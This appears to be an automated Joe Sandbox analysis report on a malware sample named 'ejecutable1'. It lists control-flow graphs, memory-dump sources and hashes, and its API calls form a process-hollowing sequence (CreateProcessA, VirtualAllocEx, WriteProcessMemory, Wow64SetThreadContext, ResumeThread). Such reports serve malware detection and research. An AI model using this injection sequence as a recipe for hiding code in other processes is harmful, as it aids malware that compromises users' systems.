                                                                    control_flow_graph 69 da7ff0-da8089 71 da808b-da80a2 69->71 72 da80d2-da80fa 69->72 71->72 75 da80a4-da80a9 71->75 76 da80fc-da8110 72->76 77 da8140-da8196 72->77 78 da80ab-da80b5 75->78 79 da80cc-da80cf 75->79 76->77 84 da8112-da8117 76->84 86 da8198-da81ac 77->86 87 da81dc-da82d3 CreateProcessA 77->87 80 da80b9-da80c8 78->80 81 da80b7 78->81 79->72 80->80 85 da80ca 80->85 81->80 88 da813a-da813d 84->88 89 da8119-da8123 84->89 85->79 86->87 95 da81ae-da81b3 86->95 105 da82dc-da83a1 87->105 106 da82d5-da82db 87->106 88->77 90 da8127-da8136 89->90 91 da8125 89->91 90->90 94 da8138 90->94 91->90 94->88 97 da81d6-da81d9 95->97 98 da81b5-da81bf 95->98 97->87 99 da81c3-da81d2 98->99 100 da81c1 98->100 99->99 101 da81d4 99->101 100->99 101->97 117 da83bd-da83be 105->117 106->105 118 da8398-da83a1 117->118 119 da83c0-da83c1 117->119 118->117 120 da83c3-da83c7 119->120 121 da83d1-da83d5 119->121 120->121 122 da83c9 120->122 123 da83d7-da83db 121->123 124 da83e5-da83e9 121->124 122->121 123->124 125 da83dd 123->125 126 da83eb-da83ef 124->126 127 da83f9-da83fd 124->127 125->124 126->127 128 da83f1 126->128 129 da83ff-da8428 127->129 130 da8433-da843e 127->130 128->127 129->130 134 da843f 130->134 134->134
                                                                    APIs
                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00DA82B7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: CreateProcess
                                                                    • String ID: <mw$<mw$<mw
                                                                    • API String ID: 963392458-139993042
                                                                    • Opcode ID: c49e183c08e7b009963c3dc85510edb9b5c06896de5dc6fc25ce822c1878e5ef
                                                                    • Instruction ID: 09e9c0cdd011e45e92f700b8a42fc0140d56bfd38bec8e51c1025720148a2cdb
                                                                    • Opcode Fuzzy Hash: c49e183c08e7b009963c3dc85510edb9b5c06896de5dc6fc25ce822c1878e5ef
                                                                    • Instruction Fuzzy Hash: 0DC10371D0022D8FDF20CFA4C841BEEBBB1BB4A304F1495A9D849B7280DB749A85DF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1067 27f750-27f771 1068 27f773 1067->1068 1069 27f778-27f783 1067->1069 1068->1069 1070 27f798-27f79c 1069->1070 1071 27f785-27f791 1070->1071 1072 27f79e-27f7a5 1070->1072 1071->1070 1073 27f793 1071->1073 1074 27f7a7 1072->1074 1075 27f7ad-27f7c6 1072->1075 1073->1070 1091 27f7a7 call da3e2a 1074->1091 1092 27f7a7 call da2843 1074->1092 1093 27f7a7 call da3003 1074->1093 1094 27f7a7 call da0ec3 1074->1094 1077 27f827-27f833 1075->1077 1078 27f835-27f83a 1077->1078 1079 27f7c8-27f7d4 1077->1079 1080 27f7d6 1079->1080 1081 27f7db-27f7ee 1079->1081 1080->1081 1083 27f824 1081->1083 1084 27f7f0-27f7fc 1081->1084 1083->1077 1085 27f7fe-27f807 1084->1085 1086 27f81d 1084->1086 1087 27f80e-27f811 1085->1087 1088 27f809-27f80c 1085->1088 1089 27f820-27f823 1086->1089 1090 27f81b 1087->1090 1088->1090 1090->1089 1091->1075 1092->1075 1093->1075 1094->1075
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `!@m$`!@m
                                                                    • API String ID: 0-2319818447
                                                                    • Opcode ID: b0c25da21070384a0f8ba09b3e148b3ded7fd335644ea9bb53d91a25966ac9c8
                                                                    • Instruction ID: 343f6b08297068b347a696b4b4ece59703b63dc9a0f070005aeec353e494a7da
                                                                    • Opcode Fuzzy Hash: b0c25da21070384a0f8ba09b3e148b3ded7fd335644ea9bb53d91a25966ac9c8
                                                                    • Instruction Fuzzy Hash: A2312770D1820ACFDB98DFA9D9856AEFBF1BF88300F10C16AD809A7644D7349990CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1125 da7b60-da7bd3 1127 da7bea-da7c51 WriteProcessMemory 1125->1127 1128 da7bd5-da7be7 1125->1128 1130 da7c5a-da7cac 1127->1130 1131 da7c53-da7c59 1127->1131 1128->1127 1131->1130
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA7C3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: ba0debfce125050e28a4aeeb55983f37cb032842bf14af7151ed8c9cbfeb6cb2
                                                                    • Instruction ID: e4ae63e43c48794d775204d126131e79120e0e65ad6a2e581f5754ccef418040
                                                                    • Opcode Fuzzy Hash: ba0debfce125050e28a4aeeb55983f37cb032842bf14af7151ed8c9cbfeb6cb2
                                                                    • Instruction Fuzzy Hash: F741BBB4D052589FCF00CFA9D984AEEFBF1BB49314F24942AE815B7240D734AA45CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 1136 da7b68-da7bd3 1138 da7bea-da7c51 WriteProcessMemory 1136->1138 1139 da7bd5-da7be7 1136->1139 1141 da7c5a-da7cac 1138->1141 1142 da7c53-da7c59 1138->1142 1139->1138 1142->1141
                                                                    APIs
                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA7C3B
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessWrite
                                                                    • String ID:
                                                                    • API String ID: 3559483778-0
                                                                    • Opcode ID: f9acb43883dec549d1742cdc2a6c5ae5afb206497adc0d9dccd214dfbefa920f
                                                                    • Instruction ID: b199e6cf06f162e11ccc7707ed6cbb909bf7995c179c4bd586f7778f12088325
                                                                    • Opcode Fuzzy Hash: f9acb43883dec549d1742cdc2a6c5ae5afb206497adc0d9dccd214dfbefa920f
                                                                    • Instruction Fuzzy Hash: 934199B4D012589FCF00CFA9D984AEEFBF5BB49314F24942AE819B7240D735AA45CF64
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

Control-flow Graph
• Basic blocks (rendered graph not reproduced): 1147 da7d14-da7de0 ReadProcessMemory; 1151 da7de9-da7e3b; 1152 da7de2-da7de8. Edges: 1147->1151, 1147->1152, 1152->1151
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA7DCA
Memory Dump Source
• Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 2076f2e89dffe88304db722034e609f32fadd73a37b09b35ce89d3e87d038549
• Instruction ID: a4fe4eb9c1ef9a1c122e780aa6236fd722bd41c900fa89d7ea9514e31eb075a5
• Opcode Fuzzy Hash: 2076f2e89dffe88304db722034e609f32fadd73a37b09b35ce89d3e87d038549
• Instruction Fuzzy Hash: 5141A9B8D042589FCF10CFA9D884AEEFBB5BF09310F24942AE815B7240D735A945CF65
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Basic blocks (rendered graph not reproduced): 1157 da7d18-da7de0 ReadProcessMemory; 1160 da7de9-da7e3b; 1161 da7de2-da7de8. Edges: 1157->1160, 1157->1161, 1161->1160
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00DA7DCA
Memory Dump Source
• Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: c4c7f4fa51f022d73f2fb6e97a88b15489eaf4d640370e58272112e1545105f7
• Instruction ID: 9cbd495c2b9c95fb65d08a643c159f79be5bd6e65796cb758e37c6082d78bb8a
• Opcode Fuzzy Hash: c4c7f4fa51f022d73f2fb6e97a88b15489eaf4d640370e58272112e1545105f7
• Instruction Fuzzy Hash: 3441B9B8D002589FCF00CFA9D884AEEFBB5BF09310F24942AE815B7200D735A945CF65
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Basic blocks (rendered graph not reproduced): 1166 da79eb-da7a9c VirtualAllocEx; 1170 da7a9f-da7ab0; 1171 da7ab9-da7b03; 1172 da7ab2-da7ab8. Edges: 1166->1170, 1170->1171, 1170->1172, 1172->1171
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00DA7A9A
Memory Dump Source
• Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: f5124601f908cd4e886a6e705e0e08983a6f0688527eab5901719fb4e8af308b
• Instruction ID: 7b9a894058c4738f8bd5d0b70ee09edc9f249d9742762ed6391eb57c5fea1693
• Opcode Fuzzy Hash: f5124601f908cd4e886a6e705e0e08983a6f0688527eab5901719fb4e8af308b
• Instruction Fuzzy Hash: 66418AB9D002589FCF10CFA9D884ADEFBB5FB49310F14942AE915B7200D735A915CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Basic blocks (rendered graph not reproduced): 1177 da79f0-da7a9c VirtualAllocEx; 1180 da7a9f-da7ab0; 1181 da7ab9-da7b03; 1182 da7ab2-da7ab8. Edges: 1177->1180, 1180->1181, 1180->1182, 1182->1181
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00DA7A9A
Memory Dump Source
• Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 8c56a9612ea45b35199fb36daf3b89553bbffd6393af9f6c119135e16c8c508a
• Instruction ID: b916ce4328ed63255aa6987fdfefad763fd6c0b779c17037d5d07e8640727e09
• Opcode Fuzzy Hash: 8c56a9612ea45b35199fb36daf3b89553bbffd6393af9f6c119135e16c8c508a
• Instruction Fuzzy Hash: 234198B8D002589FCF10CFA9D884AEEFBB5FB49310F20942AE815B7200D735A901CFA5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
• Basic blocks (rendered graph not reproduced): 1187 da7778-da77e0; 1189 da77e2-da77f4; 1190 da77f7-da7845 Wow64SetThreadContext; 1192 da784e-da789a; 1193 da7847-da784d. Edges: 1187->1189, 1187->1190, 1189->1190, 1190->1192, 1190->1193, 1193->1192
APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 00DA782F
Memory Dump Source
• Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 201830239fa3ca9f513c8b8157d505ad1c6b078520e953823f8185f26ff20b26
• Instruction ID: 3302aae2ec1ed52ca63b145351604ec3c7cfaeb42afa0dcc92d26ff106ff4e25
• Opcode Fuzzy Hash: 201830239fa3ca9f513c8b8157d505ad1c6b078520e953823f8185f26ff20b26
• Instruction Fuzzy Hash: 4041ACB4D012589FCB14CFA9D884AEEFBB1FF49314F24842AE419B7240D739A945CFA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 00DA782F
Memory Dump Source
• Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
Similarity
• API ID: ContextThreadWow64
• String ID:
• API String ID: 983334009-0
• Opcode ID: 3314aea7dc9985a88a435f4c8229e47011e4e039cc8726013fd8a83dd74ae8ac
• Instruction ID: 5aa34d91db77ec1eaaf179983c22aee3212ba31117367eeebddd5ca597476729
• Opcode Fuzzy Hash: 3314aea7dc9985a88a435f4c8229e47011e4e039cc8726013fd8a83dd74ae8ac
• Instruction Fuzzy Hash: 7E41BEB4D012589FCB10CFA9D884AEEFBF5BF49314F24842AE415B7240D779A945CFA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• ResumeThread.KERNELBASE(?), ref: 00DA76BE
Memory Dump Source
• Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 4529a5b4343182da4a2670f3717a3c34892dc753b86b9e9e0229feff04db6bea
• Instruction ID: 16c6bfa24dab3c086b060aba5e5413f039c5358f6404f13bbb401e6d8c525050
• Opcode Fuzzy Hash: 4529a5b4343182da4a2670f3717a3c34892dc753b86b9e9e0229feff04db6bea
• Instruction Fuzzy Hash: 73319AB5D012189FCB14CFA9D884ADEFBB5AB49314F24982AE815B7240D735A901CFA5
Uniqueness
Uniqueness Score: -1.00%

APIs
• ResumeThread.KERNELBASE(?), ref: 00DA76BE
Memory Dump Source
• Source File: 00000000.00000002.406205874.0000000000DA0000.00000040.00000001.sdmp, Offset: 00DA0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_da0000_ejecutable1.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 5e876c8424e015d9dc2bc9b517f05af949fa17dccab2afee76661151c4d6d344
• Instruction ID: 7279f0e009a9e600953280ee44e06515e8ec0bac4c88f19476d339fbddaf3b99
• Opcode Fuzzy Hash: 5e876c8424e015d9dc2bc9b517f05af949fa17dccab2afee76661151c4d6d344
• Instruction Fuzzy Hash: 2731AAB4D042189FCB14CFA9D884AEEFBB5AB49314F24982AE815B7240C735A901CFA5
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 12c74f16f0a2445f8383e25d0fae2f79f12382288d7ae39f355c9474c4e67d08
• Instruction ID: 2fc0c33ffc756776737c13bd595f401cb83fd59300490c12e5127111491465e2
• Opcode Fuzzy Hash: 12c74f16f0a2445f8383e25d0fae2f79f12382288d7ae39f355c9474c4e67d08
• Instruction Fuzzy Hash: 93818B70959388CFDB11EFB8D8586DCBFB0EF06345F458496D059AB2A2DB384888CF56
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 850809f51f2c641cf51251fc9987910749be9c530dea30de63b4892d1d95b1a1
• Instruction ID: a0337123cdc2350ca86aeec8bf2ade7b510a136d653f0a423a0457935a36fee4
• Opcode Fuzzy Hash: 850809f51f2c641cf51251fc9987910749be9c530dea30de63b4892d1d95b1a1
• Instruction Fuzzy Hash: 946106B4E14609CFCB14CFA9D848AAEBBF2FF49304F54902AE509AB354DB749951CF40
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 3b6f1fdeb7c3bb4f1fd9191b93a3741b60fac2e0855d28bde8b9b4171625f7f1
• Instruction ID: 320c224aa5e022263511169f6e8b5109af4034c63795b1fbc9722cbbfd15feee
• Opcode Fuzzy Hash: 3b6f1fdeb7c3bb4f1fd9191b93a3741b60fac2e0855d28bde8b9b4171625f7f1
• Instruction Fuzzy Hash: 0A8115B4E10259CFDB20DFA4E848AACBBF1FB09345F50C4A9E41DA7261DB785984CF45
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d9952d2ed1ce9e6c0016fc99f75df8ee03a45f9840a3b2d2d0b670af07239cc8
• Instruction ID: 85e3e071d3e8f8dea4a7fc43b228a95307074e5bc1e187e4f3fc2b309bbe845b
• Opcode Fuzzy Hash: d9952d2ed1ce9e6c0016fc99f75df8ee03a45f9840a3b2d2d0b670af07239cc8
• Instruction Fuzzy Hash: C7511570E25619CFCB04CFA9D4886EDBBF2BF88300F24C42AD419AB644D7749995CF51
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c4121a65893289ed4d81da6eab1b60a639c0c82d3e0ecd148f8cfc3fde57d679
• Instruction ID: 32b7300752324b533758d2add6e043df1606ecbe495ffd723d0a908c0de6f653
• Opcode Fuzzy Hash: c4121a65893289ed4d81da6eab1b60a639c0c82d3e0ecd148f8cfc3fde57d679
• Instruction Fuzzy Hash: 037104B4A10209CFDB50EFA8E848AACBBF1FB08345F50C5A9E41DA7260DB745984CF56
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 492c9f21d2e7145341e937187d0574abb49517b38c7088189bb254a96a0a5f6e
• Instruction ID: da7d351196acc2dfb7fc0b89142752a04ad8e8e15d47452fea3366a166a3e5db
• Opcode Fuzzy Hash: 492c9f21d2e7145341e937187d0574abb49517b38c7088189bb254a96a0a5f6e
• Instruction Fuzzy Hash: 167125B4E10249CFDB10EFA8E848AACBBF1FF09345F50C469E419AB261DB749984CF45
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d132bfc8729b82f7022e0aab7f30a2621a7e9e8c1ec695176f53a954475b1cae
• Instruction ID: 4d7a693a83512b2e26e01410920172575e817fd4a2a251a6bcb283abe70bdc69
• Opcode Fuzzy Hash: d132bfc8729b82f7022e0aab7f30a2621a7e9e8c1ec695176f53a954475b1cae
• Instruction Fuzzy Hash: DE71F4B4E11209CFDB50DFA4D848A9CBBB1FB09344F50C5A9E41DA7360DB745984CF55
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 00f9f453bee381d42ae39b2751496d2999a4b926b5564d9ea7c4d7dfe4ec61ef
• Instruction ID: 4e95085e94faab5167d81a064182b07ea1e7db58c3fa83161b3083d99967a708
• Opcode Fuzzy Hash: 00f9f453bee381d42ae39b2751496d2999a4b926b5564d9ea7c4d7dfe4ec61ef
• Instruction Fuzzy Hash: 285106B0E052589FCB05CFA9C890AEDFBF2EF89314F2481AAD419E7261DB745946CF50
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 752f4f0cc82747536345d917fe1432a0f4b819948393d270b2c2a4e0691353a5
• Instruction ID: 548d968bc8f4757463f4c6c20917aa1defc867e7b26ee854161a1cf928ff4374
• Opcode Fuzzy Hash: 752f4f0cc82747536345d917fe1432a0f4b819948393d270b2c2a4e0691353a5
• Instruction Fuzzy Hash: 29511370A10249CFDB10DFA8D848BACBBF0FB09345F50C4A9E41DA7261DB785994CF56
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 471512e68f26c60c647289f2c043099dac5dc4017c9d71f79390415f2cf1f8af
• Instruction ID: 57b68a01983f6a714c9d8c39d962ee82d8020936b656e0bc68623d6e794da6a5
• Opcode Fuzzy Hash: 471512e68f26c60c647289f2c043099dac5dc4017c9d71f79390415f2cf1f8af
• Instruction Fuzzy Hash: 87611574A10249CFDB60DFA4E848AACBBB1FB09341F50C4AAE41EA7360DB7459C4CF56
Uniqueness
Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 17644535b9ee3153d69644510adb4241f9c2a52422331497ffd6a883b67f5e67
• Instruction ID: e16b53f9a78c306a251034b6ae91b5798177dfda194ae3b08968466671be722a
• Opcode Fuzzy Hash: 17644535b9ee3153d69644510adb4241f9c2a52422331497ffd6a883b67f5e67
• Instruction Fuzzy Hash: 125107B4E50249CFDB20DFA8E84CAACBBB1FB09345F50C469E41EA7261DB745984CF46
Uniqueness
Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d554f40ca22d979e42da70cd2acf7bd0bc765efb86724ccf3637e44cf861380a
                                                                    • Instruction ID: 775cfbf7f28bb0321f755f394d7eff513c5941f4406ccdcce46e0a861c9bbe40
                                                                    • Opcode Fuzzy Hash: d554f40ca22d979e42da70cd2acf7bd0bc765efb86724ccf3637e44cf861380a
                                                                    • Instruction Fuzzy Hash: 955126B4A10209CFDB10DFA4D848AACBBF1FB09345F50C469E41EA7261DB745994CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b26f617a5220733a63d32a9dcb9f97e671832bb0ac1a9a1d50c9db574943b95
                                                                    • Instruction ID: 883065e0cbef2ae69e043f3e4f6f6f1034bc9dac282f5b5f536440aa19868f78
                                                                    • Opcode Fuzzy Hash: 9b26f617a5220733a63d32a9dcb9f97e671832bb0ac1a9a1d50c9db574943b95
                                                                    • Instruction Fuzzy Hash: 995106B4E10249CFDB50EFA8D848AACBBB1FB09345F50C469E41DA7361DB745984CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6d90537b9e6a0edb16a17dd435b3f48e3de2cd1bc2891292a59590441bf6214d
                                                                    • Instruction ID: 26f5a10590875c75942a3c7efc54c88b6e0aab45c6673dc2f025b7a134a64822
                                                                    • Opcode Fuzzy Hash: 6d90537b9e6a0edb16a17dd435b3f48e3de2cd1bc2891292a59590441bf6214d
                                                                    • Instruction Fuzzy Hash: B15106B4E10249CFDB10EFA8E848AACBBF1FB09345F50C469E419AB361DB745994CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: cbb067c6e90530ecb58daeb744763bd88fa511d9e4ed0758e1b8852d91311881
                                                                    • Instruction ID: fdfe7dee57daac0e2b2fcc2fbc63d3ad21ca891ba6b33740c634df5a34108664
                                                                    • Opcode Fuzzy Hash: cbb067c6e90530ecb58daeb744763bd88fa511d9e4ed0758e1b8852d91311881
                                                                    • Instruction Fuzzy Hash: 135105B4E10249CFDB10EFA8E44CAACBBF1FB09345F50C469E419AB261DB785994CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 32f0757ef0bf388f989b6cc3ee257c0ba74bd0dfccde55b5bd2e098eb34600f5
                                                                    • Instruction ID: 9e09a608eeaf63b600b8add2dab077fa599bf4feec0716d159c3173ba535f308
                                                                    • Opcode Fuzzy Hash: 32f0757ef0bf388f989b6cc3ee257c0ba74bd0dfccde55b5bd2e098eb34600f5
                                                                    • Instruction Fuzzy Hash: 0551F6B4A10249CFDB10EFA8E84CAACBBF1FB09345F50C469E419AB261DB745994CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405827262.0000000000270000.00000040.00000001.sdmp, Offset: 00270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_270000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7032f093fae0aec0f117241aedd230065d34e32d070811babc02166bd21b41c
                                                                    • Instruction ID: 3489771623a50bde0a5d6475e7ec87a1a546937bbe5a515da1165098f3112a3f
                                                                    • Opcode Fuzzy Hash: b7032f093fae0aec0f117241aedd230065d34e32d070811babc02166bd21b41c
                                                                    • Instruction Fuzzy Hash: C35106B4A10249CFDB10EFA8E44CAACBBF1FB09345F50C469E41AAB261DB745994CF46
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.405762675.000000000017D000.00000040.00000001.sdmp, Offset: 0017D000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17d000_ejecutable1.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3acffc100928a4da7c571b3c49d438d34e6b07555fd595e42b9687885580258c
